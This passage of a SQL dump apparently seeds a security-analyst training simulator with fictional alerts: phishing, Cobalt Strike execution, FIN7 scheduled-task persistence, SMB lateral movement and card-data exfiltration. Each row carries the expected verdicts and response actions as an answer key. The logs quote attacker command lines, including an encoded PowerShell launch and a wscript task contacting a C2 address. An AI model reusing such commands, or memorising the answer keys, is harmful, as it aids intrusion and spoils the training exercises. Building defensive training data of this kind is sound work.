data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1094, 'Suspicious Network Traffic Detected', 'medium', 'Network Monitoring', 'A suspicious spear-phishing email was identified targeting an employee in the finance department. It contained a malicious attachment designed to compromise the network.', 'Initial Access', 'T1566.001', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-15T14:23:32Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.50\",\"email_subject\":\"Invoice Attached - Urgent\",\"attachment_name\":\"Invoice_2023.pdf\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"recipient_email\":\"john.doe@retailcorp.com\",\"sender_email\":\"finance@trustedvendor.com\",\"alert_id\":\"123456789\",\"rule_triggered\":\"Spear-Phishing Detection\",\"user_agent\":\"Mozilla/5.0\"}', '2026-01-28 00:05:11', '2026-03-09 21:14:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Malicious PDF file hash used in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@retailcorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Email address belongs to a retail company employee.\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"finance@trustedvendor.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Email address 
spoofed to appear from a trusted vendor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1095, 'Unauthorized Execution of Penetration Testing Tools', 'high', 'Endpoint Detection and Response', 'The attackers successfully deployed Cobalt Strike, a legitimate penetration testing tool, to execute commands and begin lateral movement within the network.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-09T14:25:35Z\",\"event_id\":\"4720\",\"hostname\":\"compromised-host\",\"username\":\"attacker_user\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start cobaltstrike.exe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"file_hash\":\"3a7d1f7b9a3b4c1d4f3e5b6c7d8e9f1a\",\"file_name\":\"cobaltstrike.exe\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Associated with recent APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7d1f7b9a3b4c1d4f3e5b6c7d8e9f1a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as Cobalt Strike payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cobaltstrike.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Cobalt Strike.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized 
access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1096, 'Newly Created Scheduled Tasks', 'high', 'System Logs', 'FIN7 has been detected creating a new scheduled task on a compromised system to maintain persistent access. The task was disguised with a legitimate-sounding name to avoid detection.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_id\":4698,\"provider\":\"Microsoft-Windows-TaskScheduler\",\"task_name\":\"UpdateSecurityDefinitions\",\"task_author\":\"SYSTEM\",\"task_trigger\":\"Daily\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Windows\\\\Temp\\\\updater.js\",\"task_user\":\"COMPROMISED_USER\",\"task_description\":\"Scheduled task to keep the system updated\",\"task_creation_time\":\"2023-10-15T03:44:50Z\",\"executing_process\":{\"process_id\":5672,\"process_name\":\"wscript.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\wscript.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Windows\\\\Temp\\\\updater.js\",\"parent_process_id\":1248,\"parent_process_name\":\"explorer.exe\"},\"network_communication\":{\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"initiated_by\":\"wscript.exe\"},\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"internal_ip\":\"192.168.1.10\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"updater.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with FIN7 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for FIN7 malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server 
for FIN7\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"COMPROMISED_USER\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe 
C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system 
updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.806Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_id\\\":4698,\\\"provider\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"task_name\\\":\\\"UpdateSecurityDefinitions\\\",\\\"task_author\\\":\\\"SYSTEM\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"task_user\\\":\\\"COMPROMISED_USER\\\",\\\"task_description\\\":\\\"Scheduled task to keep the system updated\\\",\\\"task_creation_time\\\":\\\"2023-10-15T03:44:50Z\\\",\\\"executing_process\\\":{\\\"process_id\\\":5672,\\\"process_name\\\":\\\"wscript.exe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe 
C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\updater.js\\\",\\\"parent_process_id\\\":1248,\\\"parent_process_name\\\":\\\"explorer.exe\\\"},\\\"network_communication\\\":{\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"initiated_by\\\":\\\"wscript.exe\\\"},\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1097, 'Lateral Movement Detected via SMB', 'high', 'Network Traffic Analysis', 'Using compromised credentials, the attackers pivot through the network, exploiting SMB vulnerabilities to reach point-of-sale systems.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:34Z\",\"event_type\":\"SMB_Lateral_Movement_Detected\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.1.15\",\"username\":\"compromised_user\",\"smb_command\":\"SMB_COM_SESSION_SETUP_ANDX\",\"file_accessed\":\"\\\\\\\\10.0.1.15\\\\C$\\\\pos_data\\\\transaction.exe\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"access_granted\",\"logon_type\":\"Network\",\"domain\":\"internal.local\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with lateral movement attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Identified as internal point-of-sale system.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Previously flagged for anomalous behavior.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1098, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention', 'FIN7 exfiltrated sensitive credit card information from POS systems using encrypted channels. The data transfer was masked as legitimate traffic, bypassing standard security checks.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:33Z\",\"event_id\":\"738291\",\"source_ip\":\"10.20.30.40\",\"destination_ip\":\"203.0.113.42\",\"protocol\":\"HTTPS\",\"file_hash\":\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\",\"username\":\"john_doe\",\"filename\":\"credit_card_data.zip\",\"action\":\"exfiltration\",\"status\":\"success\"}', '2026-01-28 00:05:11', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with compromised POS system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by FIN7 for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware associated with FIN7 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal audit\",\"verdict\":\"suspicious\",\"details\":\"User account involved in unauthorized data transfer.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"credit_card_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file integrity monitoring\",\"verdict\":\"malicious\",\"details\":\"Sensitive data archive intended for 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.810Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:33Z\\\",\\\"event_id\\\":\\\"738291\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"3d2e479b8b6f2c593b0e6e5b8f8a7d4a\\\",\\\"username\\\":\\\"john_doe\\\",\\\"filename\\\":\\\"credit_card_data.zip\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1099, 'Initial Access: Phishing Campaign Detected', 'high', 'Email Security Gateway', 'A targeted phishing campaign by Silence Group was detected, aiming to gain initial access to bank networks. Phishing emails with malicious attachments were sent to multiple bank employees to harvest credentials.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:23Z\",\"email_id\":\"dcd3f9b1-4f5c-4c2b-bf5e-8a3f3d1a9a5f\",\"sender\":\"alert@bank-security.com\",\"recipient\":\"john.doe@bank.com\",\"subject\":\"Urgent: Account Verification Required\",\"attachment\":{\"filename\":\"Verification_Document.docx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"smtp_server\":\"smtp.bank.com\",\"phishing_url\":\"http://verify.bank-account.com/login\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_employee_directory\",\"verdict\":\"internal\",\"details\":\"Registered bank employee\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing source 